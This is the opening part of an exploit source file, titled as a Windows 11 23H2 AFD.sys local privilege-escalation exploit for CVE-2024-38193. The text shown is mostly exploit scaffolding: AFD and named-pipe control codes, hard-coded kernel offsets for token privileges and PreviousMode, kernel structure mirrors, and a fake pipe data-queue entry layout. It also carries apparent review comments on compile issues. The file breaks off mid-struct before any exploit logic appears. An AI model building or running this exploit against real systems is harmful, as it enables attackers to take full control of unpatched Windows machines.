# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
# Date: 2025-05-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win x64
# CVE : CVE-2024-38193
// NOTE(review): #pragma once only has an effect in a header; if this is the
// translation unit itself (it pulls in <iostream> for a program) it is a no-op.
#pragma once
#include "ntstatus.h"
#include "Windows.h"
#include <iostream>
// ntdll.lib is linked for the Nt* native calls -- presumably made later in
// the file, which is not in view here.
#pragma comment(lib, "ntdll.lib")
// Split a 64-bit value into its high and low 32 bits. LODWORD relies on the
// DWORD cast to truncate; both macros evaluate their argument exactly once.
#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))
// Extended-attribute name for opening an AFD endpoint. The literal is 15
// characters, the same size as AFD_CREATE_PACKET::EaName[15] below, so the
// literal's terminating NUL does not fit in that field; whether the code that
// fills the packet relies on a terminator is not in view.
#define AfdOpenPacket "AfdOpenPacketXX"
#define AFD_DEVICE_NAME L"\\Device\\Afd"
#define LOCALHOST "127.0.0.1"
// Raw AFD IOCTL and named-pipe FSCTL control codes. All but the last carry an
// LL suffix (long long literals); FSCTL_PIPE_INTERNAL_WRITE is a plain int
// literal -- harmless after conversion to a ULONG control code, but
// inconsistent with its neighbours.
#define IOCTL_AFD_BIND 0x12003LL
#define IOCTL_AFD_LISTEN 0x1200BLL
#define IOCTL_AFD_CONNECT 0x120BBLL
#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
#define FSCTL_PIPE_PEEK 0x11400CLL
#define FSCTL_PIPE_IMPERSONATE 0x11001CLL
#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8
// Object-attribute flags and a create disposition, with their documented
// values. NOTE(review): other SDK headers (e.g. winternl.h) may define the same
// names; including one of them would turn these into duplicate definitions.
#define OBJ_CASE_INSENSITIVE 0x00000040
#define OBJ_INHERIT 0x00000002
#define FILE_OPEN_IF 0x3
// Standard NTSTATUS success test: any non-negative status is success.
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
// Hard-coded kernel structure offsets for the build named in the file header
// (Windows 11 23H2, x64). Nothing in this header derives them at runtime, so
// they are build-specific constants. The OFFSET_IN_TOKEN_* values match the
// field offsets annotated on struct _TOKEN below (Privileges 0x40, PrimaryGroup
// 0xa8, DynamicPart 0xb0, DefaultDacl 0xb8, VariablePart 0x490).
#define OFFSET_IN_TOKEN_VARIABLEPART 0x490
#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
// The next three index structures that are not declared in this file; the
// names suggest KTHREAD / EPROCESS fields, but nothing here establishes that.
#define PREVIOUS_MODE_OFFSET 0x232
#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
#define OFFSET_TO_TOKEN 0x4b8
// Pseudo-handle for the calling thread (the value NtCurrentThread() yields).
#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE
// Local copy of IO_STATUS_BLOCK. NOTE(review): the typedef declares no alias
// name (MSVC warns with C4091); only the tag `struct IO_STATUS_BLOCK` is usable.
// The documented layout declares Status as NTSTATUS and Information as
// ULONG_PTR; DWORD and DWORD* have the same sizes on x64, so the 16-byte
// layout is preserved (struct _IRP below places RequestorMode at 0x40 = 0x30 + 0x10).
typedef struct IO_STATUS_BLOCK
{
union
{
DWORD Status;
PVOID Pointer;
};
DWORD* Information;
};
//0x4 bytes (sizeof)
// Kernel _SYSTEM_POWER_STATE_CONTEXT mirror: a single ULONG viewed either as
// the bit-fields or as ContextAsUlong. Referenced from the Power parameters of
// _IO_STACK_LOCATION below.
struct _SYSTEM_POWER_STATE_CONTEXT
{
union
{
struct
{
ULONG Reserved1 : 8; //0x0
ULONG TargetSystemState : 4; //0x0
ULONG EffectiveSystemState : 4; //0x0
ULONG CurrentSystemState : 4; //0x0
ULONG IgnoreHibernationPath : 1; //0x0
ULONG PseudoTransition : 1; //0x0
ULONG KernelSoftReboot : 1; //0x0
ULONG DirectedDripsTransition : 1; //0x0
ULONG Reserved2 : 8; //0x0
};
ULONG ContextAsUlong; //0x0
};
};
//0x4 bytes (sizeof)
// Kernel _POWER_STATE mirror: one 4-byte slot holding either a system or a
// device power state enum (both enums come from the SDK headers).
union _POWER_STATE
{
enum _SYSTEM_POWER_STATE SystemState; //0x0
enum _DEVICE_POWER_STATE DeviceState; //0x0
};
//0x48 bytes (sizeof)
// User-mode mirror of the kernel IO_STACK_LOCATION (0x48 bytes per the note
// above). The trailing //0x.. comments are field offsets for the target build.
// Every pointer member names its target through a `struct _X*` forward
// reference, so none of those kernel types need to be defined here; only the
// two power structures declared just above are defined in this file.
typedef struct _IO_STACK_LOCATION
{
UCHAR MajorFunction; //0x0
UCHAR MinorFunction; //0x1
UCHAR Flags; //0x2
UCHAR Control; //0x3
// Request-specific parameters; which member is meaningful depends on
// MajorFunction/MinorFunction.
union
{
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT FileAttributes; //0x18
USHORT ShareAccess; //0x1a
ULONG EaLength; //0x20
} Create; //0x8
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT Reserved; //0x18
USHORT ShareAccess; //0x1a
struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20
} CreatePipe; //0x8
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT Reserved; //0x18
USHORT ShareAccess; //0x1a
struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20
} CreateMailslot; //0x8
struct
{
ULONG Length; //0x8
ULONG Key; //0x10
ULONG Flags; //0x14
union _LARGE_INTEGER ByteOffset; //0x18
} Read; //0x8
struct
{
ULONG Length; //0x8
ULONG Key; //0x10
ULONG Flags; //0x14
union _LARGE_INTEGER ByteOffset; //0x18
} Write; //0x8
struct
{
ULONG Length; //0x8
struct _UNICODE_STRING* FileName; //0x10
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18
ULONG FileIndex; //0x20
} QueryDirectory; //0x8
struct
{
ULONG Length; //0x8
ULONG CompletionFilter; //0x10
} NotifyDirectory; //0x8
struct
{
ULONG Length; //0x8
ULONG CompletionFilter; //0x10
enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
DirectoryNotifyInformationClass; //0x18
} NotifyDirectoryEx; //0x8
struct
{
ULONG Length; //0x8
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
} QueryFile; //0x8
struct
{
ULONG Length; //0x8
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
struct _FILE_OBJECT* FileObject; //0x18
union
{
struct
{
UCHAR ReplaceIfExists; //0x20
UCHAR AdvanceOnly; //0x21
};
ULONG ClusterCount; //0x20
VOID* DeleteHandle; //0x20
};
} SetFile; //0x8
struct
{
ULONG Length; //0x8
VOID* EaList; //0x10
ULONG EaListLength; //0x18
ULONG EaIndex; //0x20
} QueryEa; //0x8
struct
{
ULONG Length; //0x8
} SetEa; //0x8
struct
{
ULONG Length; //0x8
enum _FSINFOCLASS FsInformationClass; //0x10
} QueryVolume; //0x8
struct
{
ULONG Length; //0x8
enum _FSINFOCLASS FsInformationClass; //0x10
} SetVolume; //0x8
struct
{
ULONG OutputBufferLength; //0x8
ULONG InputBufferLength; //0x10
ULONG FsControlCode; //0x18
VOID* Type3InputBuffer; //0x20
} FileSystemControl; //0x8
struct
{
union _LARGE_INTEGER* Length; //0x8
ULONG Key; //0x10
union _LARGE_INTEGER ByteOffset; //0x18
} LockControl; //0x8
struct
{
ULONG OutputBufferLength; //0x8
ULONG InputBufferLength; //0x10
ULONG IoControlCode; //0x18
VOID* Type3InputBuffer; //0x20
} DeviceIoControl; //0x8
struct
{
ULONG SecurityInformation; //0x8
ULONG Length; //0x10
} QuerySecurity; //0x8
struct
{
ULONG SecurityInformation; //0x8
VOID* SecurityDescriptor; //0x10
} SetSecurity; //0x8
struct
{
struct _VPB* Vpb; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x10
} MountVolume; //0x8
struct
{
struct _VPB* Vpb; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x10
} VerifyVolume; //0x8
struct
{
struct _SCSI_REQUEST_BLOCK* Srb; //0x8
} Scsi; //0x8
struct
{
ULONG Length; //0x8
VOID* StartSid; //0x10
struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18
ULONG SidListLength; //0x20
} QueryQuota; //0x8
struct
{
ULONG Length; //0x8
} SetQuota; //0x8
struct
{
enum _DEVICE_RELATION_TYPE Type; //0x8
} QueryDeviceRelations; //0x8
struct
{
struct _GUID* InterfaceType; //0x8
USHORT Size; //0x10
USHORT Version; //0x12
struct _INTERFACE* Interface; //0x18
VOID* InterfaceSpecificData; //0x20
} QueryInterface; //0x8
struct
{
struct _DEVICE_CAPABILITIES* Capabilities; //0x8
} DeviceCapabilities; //0x8
struct
{
struct _IO_RESOURCE_REQUIREMENTS_LIST*
IoResourceRequirementList; //0x8
} FilterResourceRequirements; //0x8
struct
{
ULONG WhichSpace; //0x8
VOID* Buffer; //0x10
ULONG Offset; //0x18
ULONG Length; //0x20
} ReadWriteConfig; //0x8
struct
{
UCHAR Lock; //0x8
} SetLock; //0x8
struct
{
enum BUS_QUERY_ID_TYPE IdType; //0x8
} QueryId; //0x8
struct
{
enum DEVICE_TEXT_TYPE DeviceTextType; //0x8
ULONG LocaleId; //0x10
} QueryDeviceText; //0x8
struct
{
UCHAR InPath; //0x8
UCHAR Reserved[3]; //0x9
enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10
} UsageNotification; //0x8
struct
{
enum _SYSTEM_POWER_STATE PowerState; //0x8
} WaitWake; //0x8
struct
{
struct _POWER_SEQUENCE* PowerSequence; //0x8
} PowerSequence; //0x8
struct
{
union
{
ULONG SystemContext; //0x8
struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext;
//0x8
};
enum _POWER_STATE_TYPE Type; //0x10
union _POWER_STATE State; //0x18
enum POWER_ACTION ShutdownType; //0x20
} Power; //0x8
struct
{
struct _CM_RESOURCE_LIST* AllocatedResources; //0x8
struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10
} StartDevice; //0x8
struct
{
ULONGLONG ProviderId; //0x8
VOID* DataPath; //0x10
ULONG BufferSize; //0x18
VOID* Buffer; //0x20
} WMI; //0x8
struct
{
VOID* Argument1; //0x8
VOID* Argument2; //0x10
VOID* Argument3; //0x18
VOID* Argument4; //0x20
} Others; //0x8
} Parameters; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x28
struct _FILE_OBJECT* FileObject; //0x30
// Completion callback slot; a function pointer is part of this layout, so a
// copy of this structure carries code addresses as well as data.
LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP*
arg2, VOID* arg3); //0x38
VOID* Context; //0x40
}IO_STACK_LOCATION;
//0x18 bytes (sizeof)
// Kernel _KDEVICE_QUEUE_ENTRY mirror (0x18 bytes); embedded in the Tail
// overlay of struct _IRP below.
struct _KDEVICE_QUEUE_ENTRY
{
struct _LIST_ENTRY DeviceListEntry; //0x0
ULONG SortKey; //0x10
UCHAR Inserted; //0x14
};
//0x58 bytes (sizeof)
// Kernel _KAPC mirror (0x58 bytes); embedded in the Tail union of struct _IRP
// below, where it overlays the Overlay member at the same offset.
struct _KAPC
{
UCHAR Type; //0x0
UCHAR AllFlags; //0x1
UCHAR Size; //0x2
UCHAR SpareByte1; //0x3
ULONG SpareLong0; //0x4
struct _KTHREAD* Thread; //0x8
struct _LIST_ENTRY ApcListEntry; //0x10
VOID* Reserved[3]; //0x20
VOID* NormalContext; //0x38
VOID* SystemArgument1; //0x40
VOID* SystemArgument2; //0x48
CHAR ApcStateIndex; //0x50
CHAR ApcMode; //0x51
UCHAR Inserted; //0x52
};
//0xd0 bytes (sizeof)
// User-mode mirror of the kernel IRP (0xd0 bytes per the note above).
// NOTE(review): IoStatus uses the local tag `struct IO_STATUS_BLOCK` (defined
// near the top of this file) while UserIosb and UserApcRoutine refer to
// `struct _IO_STATUS_BLOCK*` -- a different, never-defined tag. Both compile
// (pointers to incomplete types), but the two names denote distinct types.
struct _IRP
{
SHORT Type; //0x0
USHORT Size; //0x2
USHORT AllocationProcessorNumber; //0x4
USHORT Reserved; //0x6
struct _MDL* MdlAddress; //0x8
ULONG Flags; //0x10
union
{
struct _IRP* MasterIrp; //0x18
LONG IrpCount; //0x18
VOID* SystemBuffer; //0x18
} AssociatedIrp; //0x18
struct _LIST_ENTRY ThreadListEntry; //0x20
struct IO_STATUS_BLOCK IoStatus; //0x30
// RequestorMode records the mode (kernel/user) the request came from.
CHAR RequestorMode; //0x40
UCHAR PendingReturned; //0x41
CHAR StackCount; //0x42
CHAR CurrentLocation; //0x43
UCHAR Cancel; //0x44
UCHAR CancelIrql; //0x45
CHAR ApcEnvironment; //0x46
UCHAR AllocationFlags; //0x47
union
{
struct _IO_STATUS_BLOCK* UserIosb; //0x48
VOID* IoRingContext; //0x48
};
struct _KEVENT* UserEvent; //0x50
union
{
struct
{
union
{
VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK*
arg2, ULONG arg3); //0x58
VOID* IssuingProcess; //0x58
};
union
{
VOID* UserApcContext; //0x60
struct _IORING_OBJECT* IoRing; //0x60
};
} AsynchronousParameters; //0x58
union _LARGE_INTEGER AllocationSize; //0x58
} Overlay; //0x58
VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);
//0x68
VOID* UserBuffer; //0x70
// Tail: the Overlay, Apc and CompletionKey members all share offset 0x78.
union
{
struct
{
union
{
struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78
VOID* DriverContext[4]; //0x78
};
struct _ETHREAD* Thread; //0x98
CHAR* AuxiliaryBuffer; //0xa0
struct _LIST_ENTRY ListEntry; //0xa8
union
{
struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
ULONG PacketType; //0xb8
};
struct _FILE_OBJECT* OriginalFileObject; //0xc0
VOID* IrpExtension; //0xc8
} Overlay; //0x78
struct _KAPC Apc; //0x78
VOID* CompletionKey; //0x78
} Tail; //0x78
};
// TDI transport address element: a length/type pair followed by the address
// bytes. Address[1] is the classic variable-length tail idiom, so sizeof()
// understates the real size; the declared element count is a placeholder.
typedef struct _TA_ADDRESS
{
USHORT AddressLength;
USHORT AddressType;
UCHAR Address[1];
}TA_ADDRESS;
// TDI transport address list: a count followed by TAAddressCount TA_ADDRESS
// entries. Address[1] is again a variable-length tail, not a fixed array.
typedef struct _TRANSPORT_ADDRESS
{
LONG TAAddressCount;
TA_ADDRESS Address[1];
}TRANSPORT_ADDRESS;
// Local copy of UNICODE_STRING (Length/MaximumLength are byte counts, not
// character counts). NOTE(review): winternl.h declares the identical type;
// including it alongside this file would produce a redefinition error.
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
// Local copy of OBJECT_ATTRIBUTES as taken by the Nt* object-open calls.
// Attributes is where the OBJ_* flags defined at the top of the file go.
// NOTE(review): winternl.h declares the same type; see the note on
// _UNICODE_STRING above.
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
// One loaded-module record as returned by NtQuerySystemInformation for
// SystemModuleInformation (value 11 in the enum below). FullPathName is a
// fixed 256-byte buffer; OffsetToFileName indexes the file-name part inside it.
typedef struct _SYSTEM_MODULE_ENTRY
{
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;
// Header of the SystemModuleInformation buffer: Count entries follow.
// Module[1] is a variable-length tail; callers must size the buffer from Count,
// not from sizeof(SYSTEM_MODULE_INFORMATION).
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;
SYSTEM_MODULE_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
// One handle-table record as returned by NtQuerySystemInformation for
// SystemExtendedHandleInformation (value 64 in the enum below). Object is the
// kernel address of the referenced object; UniqueProcessId/HandleValue
// identify the owning process and handle.
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
{
PVOID Object;
ULONG_PTR UniqueProcessId;
ULONG_PTR HandleValue;
ULONG GrantedAccess;
USHORT CreatorBackTraceIndex;
USHORT ObjectTypeIndex;
ULONG HandleAttributes;
ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
// Header of the SystemExtendedHandleInformation buffer: NumberOfHandles entries
// follow. Handles[1] is a variable-length tail, so the buffer must be sized
// from NumberOfHandles rather than from sizeof().
typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
ULONG_PTR NumberOfHandles;
ULONG_PTR Reserved;
SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
// Extended-attribute record used to open an AFD endpoint: a
// FILE_FULL_EA_INFORMATION header fused with the AFD create packet that is
// the EA value. NOTE(review): the documented FILE_FULL_EA_INFORMATION declares
// Flags as UCHAR, not WORD; the WORD here shifts EaNameLength, EaValueLength
// and everything after them relative to the documented layout. The
// commented-out trailing member suggests the author tuned this by hand;
// confirm against the code that fills and submits it (not in view).
typedef struct _AFD_CREATE_PACKET {
//FILE_FULL_EA_INFORMATION
ULONG NextEntryOffset;
WORD Flags;
UCHAR EaNameLength;
USHORT EaValueLength;
// Holds the AfdOpenPacket literal (15 characters) with no room for a NUL.
CHAR EaName[15];
//AFD_CREATE_PACKET
ULONG EndpointFlags;
ULONG GroupID;
ULONG AddressFamily;
ULONG SocketType;
ULONG Protocol;
ULONG SizeOfTransportName;
wchar_t TransportName[16];
//UCHAR Unkown;
} AFD_CREATE_PACKET;
// Only the one THREADINFOCLASS value this file needs (NtSetInformationThread
// class for setting a thread's impersonation token).
enum THREADINFOCLASS { ThreadImpersonationToken = 5 };
// The two NtQuerySystemInformation classes this file needs; their result
// layouts are SYSTEM_MODULE_INFORMATION and SYSTEM_HANDLE_INFORMATION_EX above.
enum SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemExtendedHandleInformation = 64
};
// Event kinds for NtCreateEvent (0 = notification, 1 = synchronization).
// NOTE(review): the typedef declares no alias name (MSVC C4091); the enum is
// only reachable as `enum EVENT_TYPE` / `EVENT_TYPE` via its tag.
typedef enum EVENT_TYPE {
NotificationEvent,
SynchronizationEvent
};
// Input buffer for IOCTL_AFD_BIND: a share-type flag followed by the IPv4
// socket address to bind.
typedef struct _AFD_BIND_DATA {
ULONG ShareType;
SOCKADDR_IN addr;
} AFD_BIND_DATA, * PAFD_BIND_DATA;
// Author-defined input buffer for IOCTL_AFD_CONNECT (field names are the
// author's guesses; Unknown/tmp6 are not interpreted here). alignas(16) is
// C++11, so this file is C++ despite the .c hint. NOTE(review): the typedef
// declares no alias name (MSVC C4091).
typedef struct alignas(16) MY_AFD_CONNECT_INFO
{
__int64 UseSan;
__int64 hNtSock1;
__int64 Unknown;
__int32 tmp6;
WORD const_16;
sockaddr_in bind;
};
// Author-defined layout (not a kernel symbol mirror) modelled on a named-pipe
// data-queue entry: list linkage, a security-client-context pointer, a data
// size and an inline data area. The DATA array alone is 0x77FD0 bytes, so an
// instance is roughly 0x78000 bytes and belongs on the heap, not the stack;
// where it is allocated is not in view. NOTE(review): typedef without an
// alias name (MSVC C4091).
typedef struct FAKE_DATA_ENTRY_QUEUE
{
DWORD tmp;
LIST_ENTRY nextQueue;
__int64 unknown;
PVOID security_client_context;
__int64 unknown2;
__int64 sizeOfData;
char DATA[0x77FD0];
};
// Input buffer for IOCTL_AFD_LISTEN; only the backlog (MaximumConnectionQueue)
// is interpreted here, the first field is unnamed padding/flags.
typedef struct _AFD_LISTEN_INFO {
ULONG unknown;
__int64 MaximumConnectionQueue;
} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;
// Mirror of the kernel SECURITY_CLIENT_CONTEXT, built from the SDK's
// SECURITY_QUALITY_OF_SERVICE and TOKEN_CONTROL. ClientToken is a kernel
// pointer to the captured client token object.
typedef struct _SECURITY_CLIENT_CONTEXT
{
_SECURITY_QUALITY_OF_SERVICE SecurityQos;
void* ClientToken;
unsigned __int8 DirectlyAccessClientToken;
unsigned __int8 DirectAccessEffectiveOnly;
unsigned __int8 ServerIsRemote;
_TOKEN_CONTROL ClientTokenControl;
}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;
// Kernel _OWNER_ENTRY mirror (0x10 bytes with the forced 8-byte alignment);
// used by _ERESOURCE below. NOTE(review): `___u1` begins with a double
// underscore, which is reserved for the implementation; a plain name such as
// `u1` would be safer.
struct __declspec(align(8)) _OWNER_ENTRY
{
unsigned __int64 OwnerThread;
DWORD ___u1;
};
//0x68 bytes (sizeof)
// Kernel _ERESOURCE mirror (0x68 bytes); struct _TOKEN below points at one of
// these through TokenLock. Trailing //0x.. comments are field offsets.
typedef struct _ERESOURCE
{
struct _LIST_ENTRY SystemResourcesList; //0x0
struct _OWNER_ENTRY* OwnerTable; //0x10
SHORT ActiveCount; //0x18
union
{
USHORT Flag; //0x1a
struct
{
UCHAR ReservedLowFlags; //0x1a
UCHAR WaiterPriority; //0x1b
};
};
VOID* SharedWaiters; //0x20
VOID* ExclusiveWaiters; //0x28
struct _OWNER_ENTRY OwnerEntry; //0x30
ULONG ActiveEntries; //0x40
ULONG ContentionCount; //0x44
ULONG NumberOfSharedWaiters; //0x48
ULONG NumberOfExclusiveWaiters; //0x4c
VOID* Reserved2; //0x50
union
{
VOID* Address; //0x58
ULONGLONG CreatorBackTraceIndex; //0x58
};
ULONGLONG SpinLock; //0x60
}ERESOURCE, *PERESOURCE;
//0x8 bytes (sizeof)
// Kernel _EX_PUSH_LOCK mirror: one 8-byte word viewed as lock bit-fields, as a
// raw value, or as a pointer. NOTE(review): typedef without an alias name
// (MSVC C4091); only the tag `struct _EX_PUSH_LOCK` is used below.
typedef struct _EX_PUSH_LOCK
{
union
{
struct
{
ULONGLONG Locked : 1; //0x0
ULONGLONG Waiting : 1; //0x0
ULONGLONG Waking : 1; //0x0
ULONGLONG MultipleShared : 1; //0x0
ULONGLONG Shared : 60; //0x0
};
ULONGLONG Value; //0x0
VOID* Ptr; //0x0
};
};
//0x10 bytes (sizeof)
// Kernel _SEP_CACHED_HANDLES_TABLE mirror (0x10 bytes); embedded in
// _SEP_LOGON_SESSION_REFERENCES below. The hash table type is only forward
// referenced. NOTE(review): typedef without an alias name (MSVC C4091).
typedef struct _SEP_CACHED_HANDLES_TABLE
{
struct _EX_PUSH_LOCK Lock; //0x0
struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8
};
//0x8 bytes (sizeof)
// Kernel _EX_RUNDOWN_REF mirror: one 8-byte word read as a count or a pointer.
// NOTE(review): typedef without an alias name (MSVC C4091).
typedef struct _EX_RUNDOWN_REF
{
union
{
ULONGLONG Count; //0x0
VOID* Ptr; //0x0
};
};
//0x20 bytes (sizeof)
// Kernel _OB_HANDLE_REVOCATION_BLOCK mirror (0x20 bytes); embedded in
// _SEP_LOGON_SESSION_REFERENCES below. NOTE(review): typedef without an
// alias name (MSVC C4091).
typedef struct _OB_HANDLE_REVOCATION_BLOCK
{
struct _LIST_ENTRY RevocationInfos; //0x0
struct _EX_PUSH_LOCK Lock; //0x10
struct _EX_RUNDOWN_REF Rundown; //0x18
};
//0xc0 bytes (sizeof)
// Kernel _SEP_LOGON_SESSION_REFERENCES mirror (0xc0 bytes); struct _TOKEN
// below points at one through its LogonSession member. Trailing //0x..
// comments are field offsets. NOTE(review): typedef without an alias name
// (MSVC C4091); struct mm refers to it by tag.
typedef struct _SEP_LOGON_SESSION_REFERENCES
{
struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0
struct _LUID LogonId; //0x8
struct _LUID BuddyLogonId; //0x10
LONGLONG ReferenceCount; //0x18
ULONG Flags; //0x20
struct _DEVICE_MAP* pDeviceMap; //0x28
VOID* Token; //0x30
struct _UNICODE_STRING AccountName; //0x38
struct _UNICODE_STRING AuthorityName; //0x48
struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58
struct _EX_PUSH_LOCK SharedDataLock; //0x68
struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes;
//0x70
struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78
struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80
struct _EJOB* ServerSilo; //0xa0
struct _LUID SiblingAuthId; //0xa8
struct _LIST_ENTRY TokenList; //0xb0
};
//0x30 bytes (sizeof)
// Kernel _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION mirror (0x30 bytes):
// two counted lists of security attributes. struct _TOKEN below points at one
// through pSecurityAttributes.
typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
{
ULONG SecurityAttributeCount; //0x0
struct _LIST_ENTRY SecurityAttributesList; //0x8
ULONG WorkingSecurityAttributeCount; //0x18
struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20
}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;
//0x20 bytes (sizeof)
// Kernel _SEP_SID_VALUES_BLOCK mirror (0x20 bytes): a reference-counted block
// of SidCount SID values. Referenced from struct _TOKEN (TokenSidValues) and
// _SEP_LOGON_SESSION_REFERENCES (SharedSidValues).
typedef struct _SEP_SID_VALUES_BLOCK
{
ULONG BlockLength; //0x0
LONGLONG ReferenceCount; //0x8
ULONG SidCount; //0x10
ULONGLONG SidValuesStart; //0x18
}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;
//0x18 bytes (sizeof)
// Kernel _SEP_TOKEN_PRIVILEGES mirror (0x18 bytes): three 64-bit privilege
// bitmasks. Sits at offset 0x40 of struct _TOKEN below, which is the value
// OFFSET_IN_TOKEN_TOKEN_PRIVILEGES carries at the top of the file.
struct _SEP_TOKEN_PRIVILEGES
{
ULONGLONG Present; //0x0
ULONGLONG Enabled; //0x8
ULONGLONG EnabledByDefault; //0x10
};
//0x1f bytes (sizeof)
// Kernel _SEP_AUDIT_POLICY mirror (0x1f bytes); TOKEN_AUDIT_POLICY comes from
// the SDK headers. Embedded in struct _TOKEN at 0x58.
struct _SEP_AUDIT_POLICY
{
struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0
UCHAR PolicySetStatus; //0x1e
};
//0x498 bytes (sizeof)
// User-mode mirror of the kernel _TOKEN object body (0x498 bytes per the
// note above) for the build named in the file header. The trailing //0x..
// comments are field offsets; the OFFSET_IN_TOKEN_* macros at the top of the
// file name five of them (0x40, 0xa8, 0xb0, 0xb8, 0x490). Most pointer members
// refer to kernel types that are only forward declared here.
struct _TOKEN
{
struct _TOKEN_SOURCE TokenSource; //0x0
struct _LUID TokenId; //0x10
struct _LUID AuthenticationId; //0x18
struct _LUID ParentTokenId; //0x20
union _LARGE_INTEGER ExpirationTime; //0x28
struct _ERESOURCE* TokenLock; //0x30
struct _LUID ModifiedId; //0x38
struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40
struct _SEP_AUDIT_POLICY AuditPolicy; //0x58
ULONG SessionId; //0x78
ULONG UserAndGroupCount; //0x7c
ULONG RestrictedSidCount; //0x80
ULONG VariableLength; //0x84
ULONG DynamicCharged; //0x88
ULONG DynamicAvailable; //0x8c
ULONG DefaultOwnerIndex; //0x90
struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98
struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0
VOID* PrimaryGroup; //0xa8
ULONG* DynamicPart; //0xb0
struct _ACL* DefaultDacl; //0xb8
enum _TOKEN_TYPE TokenType; //0xc0
enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4
ULONG TokenFlags; //0xc8
UCHAR TokenInUse; //0xcc
ULONG IntegrityLevelIndex; //0xd0
ULONG MandatoryPolicy; //0xd4
void* LogonSession; //0xd8
struct _LUID OriginatingLogonSession; //0xe0
struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8
struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8
struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION*
pSecurityAttributes; //0x308
VOID* Package; //0x310
struct _SID_AND_ATTRIBUTES* Capabilities; //0x318
ULONG CapabilityCount; //0x320
struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328
struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438
struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440
struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes;
